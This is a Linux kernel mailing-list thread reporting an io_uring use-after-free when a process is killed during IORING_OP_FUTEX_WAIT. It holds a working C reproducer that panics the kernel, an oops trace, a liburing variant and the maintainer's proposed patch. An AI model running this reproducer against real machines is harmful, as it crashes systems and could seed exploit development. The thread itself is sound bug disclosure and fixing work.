* use-after-free if killed while in IORING_OP_FUTEX_WAIT
From: rtm @ 2025-06-04 13:58 UTC
To: Jens Axboe, Pavel Begunkov, io-uring
[-- Attachment #1: Type: text/plain, Size: 2033 bytes --]
If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
to exit_mm() causes the futex_private_hash to be freed, along with its
buckets' locks, while the io_uring request still exists. When (a little
later in do_exit()) the io_uring fd is fput(), the resulting
futex_unqueue() tries to use the freed memory that
req->async_data->lock_ptr points to.
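
Roughly, the exit-path ordering as I read it (a sketch assembled from
the trace below, not a line-by-line walk of do_exit()):

  do_exit()
    exit_mm()                     // futex_private_hash and its
                                  //   bucket locks are freed here
    ...
    fput(io_uring fd)             // last reference dropped
      io_ring_exit_work()
        io_uring_try_cancel_requests()
          io_futex_remove_all()
            __io_futex_cancel()
              futex_unqueue()     // takes the lock that
                                  //   req->async_data->lock_ptr points
                                  //   at, inside the freed hash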
I've attached a demo:
# cc uring46b.c
# ./a.out
killing child
BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
[6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
Oops [#1]
Modules linked in:
CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE
Hardware name: riscv-virtio,qemu (DT)
Workqueue: iou_exit io_ring_exit_work
epc : spin_dump+0x38/0x6e
ra : spin_dump+0x30/0x6e
epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
...
status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
[<ffffffff80003354>] spin_dump+0x38/0x6e
[<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
[<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
[<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
[<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
[<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
[<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
[<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
[<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
[<ffffffff80057f0a>] process_one_work+0x132/0x2fe
[<ffffffff8005888c>] worker_thread+0x21e/0x2fe
[<ffffffff80060428>] kthread+0xe8/0x1ba
[<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
[<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04
---[ end trace 0000000000000000 ]---
Kernel panic - not syncing: Fatal exception
---[ end Kernel panic - not syncing: Fatal exception ]---
Robert Morris
rtm@mit.edu
[-- Attachment #2: uring46b.c --]
[-- Type: application/octet-stream, Size: 6211 bytes --]
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <linux/fs.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <linux/io_uring.h>
int dirfd = -1;
int pfds[2];
int sock = -1;
//
// adapted from:
// https://unixism.net/loti/low_level.html
// https://github.com/shuveb/io_uring-by-example
//
#define QUEUE_DEPTH 1
#define BLOCK_SZ 1024
struct app_io_sq_ring {
    unsigned *head;
    unsigned *tail;
    unsigned *ring_mask;
    unsigned *ring_entries;
    unsigned *flags;
    unsigned *array;
};

struct app_io_cq_ring {
    unsigned *head;
    unsigned *tail;
    unsigned *ring_mask;
    unsigned *ring_entries;
    struct io_uring_cqe *cqes;
};

struct submitter {
    int ring_fd;
    struct app_io_sq_ring sq_ring;
    struct io_uring_sqe *sqes;
    struct app_io_cq_ring cq_ring;
};

struct file_info {
    off_t file_sz;
    struct iovec iovecs[]; /* referred to by readv/writev */
};
int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
    return (int) syscall(__NR_io_uring_setup, entries, p);
}

int io_uring_enter(int ring_fd, unsigned int to_submit,
                   unsigned int min_complete, unsigned int flags)
{
    return (int) syscall(__NR_io_uring_enter, ring_fd, to_submit,
                         min_complete, flags, NULL, 0);
}
int app_setup_uring(struct submitter *s) {
    struct app_io_sq_ring *sring = &s->sq_ring;
    struct app_io_cq_ring *cring = &s->cq_ring;
    struct io_uring_params p;
    void *sq_ptr, *cq_ptr;

    memset(&p, 0, sizeof(p));
    s->ring_fd = io_uring_setup(QUEUE_DEPTH, &p);
    if (s->ring_fd < 0) {
        perror("io_uring_setup");
        return 1;
    }

    int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
    int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        if (cring_sz > sring_sz) {
            sring_sz = cring_sz;
        }
        cring_sz = sring_sz;
    }

    sq_ptr = mmap(0, sring_sz, PROT_READ | PROT_WRITE,
                  MAP_SHARED | MAP_POPULATE,
                  s->ring_fd, IORING_OFF_SQ_RING);
    if (sq_ptr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        cq_ptr = sq_ptr;
    } else {
        cq_ptr = mmap(0, cring_sz, PROT_READ | PROT_WRITE,
                      MAP_SHARED | MAP_POPULATE,
                      s->ring_fd, IORING_OFF_CQ_RING);
        if (cq_ptr == MAP_FAILED) {
            perror("mmap");
            return 1;
        }
    }

    sring->head = sq_ptr + p.sq_off.head;
    sring->tail = sq_ptr + p.sq_off.tail;
    sring->ring_mask = sq_ptr + p.sq_off.ring_mask;
    sring->ring_entries = sq_ptr + p.sq_off.ring_entries;
    sring->flags = sq_ptr + p.sq_off.flags;
    sring->array = sq_ptr + p.sq_off.array;

    s->sqes = mmap(0, p.sq_entries * sizeof(struct io_uring_sqe),
                   PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
                   s->ring_fd, IORING_OFF_SQES);
    if (s->sqes == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    cring->head = cq_ptr + p.cq_off.head;
    cring->tail = cq_ptr + p.cq_off.tail;
    cring->ring_mask = cq_ptr + p.cq_off.ring_mask;
    cring->ring_entries = cq_ptr + p.cq_off.ring_entries;
    cring->cqes = cq_ptr + p.cq_off.cqes;
    return 0;
}
/*
 * Queue a single IORING_OP_FUTEX_WAIT sqe and submit it. The file-read
 * scaffolding is left over from the io_uring-by-example reader this is
 * based on; the annotations on the magic values are my reading of the
 * sqe layout for futex opcodes.
 */
int submit_to_sq(char *file_path, struct submitter *s) {
    struct file_info *fi;

    int file_fd = open(file_path, O_RDONLY);
    if (file_fd < 0) {
        perror("open");
        return 1;
    }

    struct app_io_sq_ring *sring = &s->sq_ring;
    unsigned index = 0, current_block = 0, tail = 0, next_tail = 0;
    off_t file_sz = 2;
    off_t bytes_remaining = file_sz;
    int blocks = (int) file_sz / BLOCK_SZ;
    if (file_sz % BLOCK_SZ) blocks++;

    fi = malloc(sizeof(*fi) + sizeof(struct iovec) * blocks);
    if (!fi) {
        fprintf(stderr, "Unable to allocate memory\n");
        return 1;
    }
    fi->file_sz = file_sz;

    while (bytes_remaining) {
        off_t bytes_to_read = bytes_remaining;
        if (bytes_to_read > BLOCK_SZ)
            bytes_to_read = BLOCK_SZ;
        fi->iovecs[current_block].iov_len = bytes_to_read;
        void *buf;
        if (posix_memalign(&buf, BLOCK_SZ, BLOCK_SZ)) {
            perror("posix_memalign");
            return 1;
        }
        fi->iovecs[current_block].iov_base = buf;
        current_block++;
        bytes_remaining -= bytes_to_read;
    }

    next_tail = tail = *sring->tail;
    next_tail++;
    index = tail & *s->sq_ring.ring_mask;
    struct io_uring_sqe *sqe = &s->sqes[index];
    sqe->flags = 0;
    sqe->off = 0;             /* off shares a union with addr2, which
                                 holds the expected futex value (0) */
    sring->array[index] = index;
    tail = next_tail;
    sqe->len = 0;
    sqe->optval = 0x80000000; /* optval shares a union with addr3; for
                                 futex ops this is the wait mask */
    static char buf[32];
    memset(buf, 0xff, sizeof(buf));
    *(long*)buf = 0xffffffff00000000;  /* low 32 bits (the futex word)
                                          are 0, so the wait blocks */
    sqe->addr = (__u64) buf;  /* address of the futex word */
    sqe->opcode = IORING_OP_FUTEX_WAIT;
    sqe->flags = 2;           /* IOSQE_IO_DRAIN */
    sqe->fd = 130;            /* fd carries the futex2 flags here:
                                 0x82 == FUTEX2_PRIVATE | FUTEX2_SIZE_U32;
                                 PRIVATE is what matters for this bug */
    if (*sring->tail != tail) {
        *sring->tail = tail;
    }

    int ret = io_uring_enter(s->ring_fd, 1, 1,
                             IORING_ENTER_GETEVENTS);
    if (ret < 0) {
        perror("io_uring_enter");
        return 1;
    }
    return 0;
}
int
main()
{
    struct rlimit r;
    r.rlim_cur = r.rlim_max = 0;
    setrlimit(RLIMIT_CORE, &r);

    unlink("z");
    system("echo hi > z");

    int pid = fork();
    if (pid == 0) {
        struct submitter *s;

        /* leftover scaffolding from the fuzzer this came out of; not
           needed to trigger the bug, as far as I can tell */
        dirfd = open(".", 0);
        socketpair(AF_UNIX, SOCK_STREAM, 0, pfds);
        write(pfds[0], "a", 1);
        write(pfds[1], "b", 1);
        sock = socket(AF_INET, SOCK_DGRAM, 0);

        s = malloc(sizeof(*s));
        if (!s) {
            perror("malloc");
            exit(0);
        }
        memset(s, 0, sizeof(*s));
        if (app_setup_uring(s)) {
            fprintf(stderr, "Unable to setup uring!\n");
            exit(0);
        }
        /* blocks in IORING_OP_FUTEX_WAIT */
        if (submit_to_sq("z", s)) {
            fprintf(stderr, "Error reading file z\n");
            exit(0);
        }
        printf("child exiting\n");
        exit(0);
    }

    /* give the child time to block, then kill it mid-wait */
    sleep(1);
    printf("killing child\n");
    kill(pid, 9);
    usleep(200000);
}
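
For reference, here is a shorter version of the same repro using
liburing (>= 2.5, which provides io_uring_prep_futex_wait()). This is a
sketch I haven't run against this kernel -- the raw-syscall demo above
is the one that produced the oops -- and it assumes the FUTEX2_*
constants from <linux/futex.h>:

#include <stdint.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <liburing.h>
#include <linux/futex.h>

int main(void)
{
    int pid = fork();
    if (pid == 0) {
        static uint32_t futex_word;   /* stays 0, so the wait blocks */
        struct io_uring ring;

        if (io_uring_queue_init(1, &ring, 0) < 0)
            exit(1);
        struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);
        /* private 32-bit futex, wake on any bit */
        io_uring_prep_futex_wait(sqe, &futex_word, 0, FUTEX_BITSET_MATCH_ANY,
                                 FUTEX2_SIZE_U32 | FUTEX2_PRIVATE, 0);
        io_uring_submit_and_wait(&ring, 1);   /* blocks until killed */
        exit(0);
    }
    sleep(1);
    kill(pid, SIGKILL);   /* kill the child mid-FUTEX_WAIT */
    usleep(200000);
    return 0;
}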
* Re: use-after-free if killed while in IORING_OP_FUTEX_WAIT
From: Jens Axboe @ 2025-06-04 14:12 UTC
To: rtm, Pavel Begunkov, io-uring
On 6/4/25 7:58 AM, rtm@csail.mit.edu wrote:
> If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
> to exit_mm() causes the futex_private_hash to be freed, along with its
> buckets' locks, while the io_uring request still exists. When (a little
> later in do_exit()) the io_uring fd is fput(), the resulting
> futex_unqueue() tries to use the freed memory that
> req->async_data->lock_ptr points to.
>
> [...]
Thanks, I'll take a look!
--
Jens Axboe
* Re: use-after-free if killed while in IORING_OP_FUTEX_WAIT
From: Jens Axboe @ 2025-06-04 16:22 UTC
To: rtm, Pavel Begunkov, io-uring
On 6/4/25 8:12 AM, Jens Axboe wrote:
> On 6/4/25 7:58 AM, rtm@csail.mit.edu wrote:
>> If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
>> to exit_mm() causes the futex_private_hash to be freed, along with its
>> buckets' locks, while the io_uring request still exists. [...]
>
> Thanks, I'll take a look!
I think this would be the least intrusive fix, and also avoid fiddling
with mmget() for the PRIVATE case. I'll write a test case for this and
send it out as a real patch.
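The idea is that file exit cancelation runs early in do_exit(), before
exit_mm(), so a request marked inflight gets canceled while the mm --
and with it the private hash -- is still alive.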
diff --git a/io_uring/futex.c b/io_uring/futex.c
index 383e0d99ad27..246bfb862db9 100644
--- a/io_uring/futex.c
+++ b/io_uring/futex.c
@@ -148,6 +148,8 @@ int io_futex_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
 	    !futex_validate_input(iof->futex_flags, iof->futex_mask))
 		return -EINVAL;
 
+	/* Mark as inflight, so file exit cancelation will find it */
+	io_req_track_inflight(req);
 	return 0;
 }
 
@@ -194,6 +196,8 @@ int io_futexv_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
 		return ret;
 	}
 
+	/* Mark as inflight, so file exit cancelation will find it */
+	io_req_track_inflight(req);
 	iof->futexv_unqueued = 0;
 	req->flags |= REQ_F_ASYNC_DATA;
 	req->async_data = ifd;
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index c7a9cecf528e..cf759c172083 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -408,7 +408,12 @@ static void io_clean_op(struct io_kiocb *req)
 	req->flags &= ~IO_REQ_CLEAN_FLAGS;
 }
 
-static inline void io_req_track_inflight(struct io_kiocb *req)
+/*
+ * Mark the request as inflight, so that file cancelation will find it.
+ * Can be used if the file is an io_uring instance, or if the request itself
+ * relies on ->mm being alive for the duration of the request.
+ */
+inline void io_req_track_inflight(struct io_kiocb *req)
 {
 	if (!(req->flags & REQ_F_INFLIGHT)) {
 		req->flags |= REQ_F_INFLIGHT;
diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
index 0ea7a435d1de..d59c12277d58 100644
--- a/io_uring/io_uring.h
+++ b/io_uring/io_uring.h
@@ -83,6 +83,7 @@ void io_add_aux_cqe(struct io_ring_ctx *ctx, u64 user_data, s32 res, u32 cflags)
 bool io_req_post_cqe(struct io_kiocb *req, s32 res, u32 cflags);
 void __io_commit_cqring_flush(struct io_ring_ctx *ctx);
 
+void io_req_track_inflight(struct io_kiocb *req);
 struct file *io_file_get_normal(struct io_kiocb *req, int fd);
 struct file *io_file_get_fixed(struct io_kiocb *req, int fd,
 			       unsigned issue_flags);
--
Jens Axboe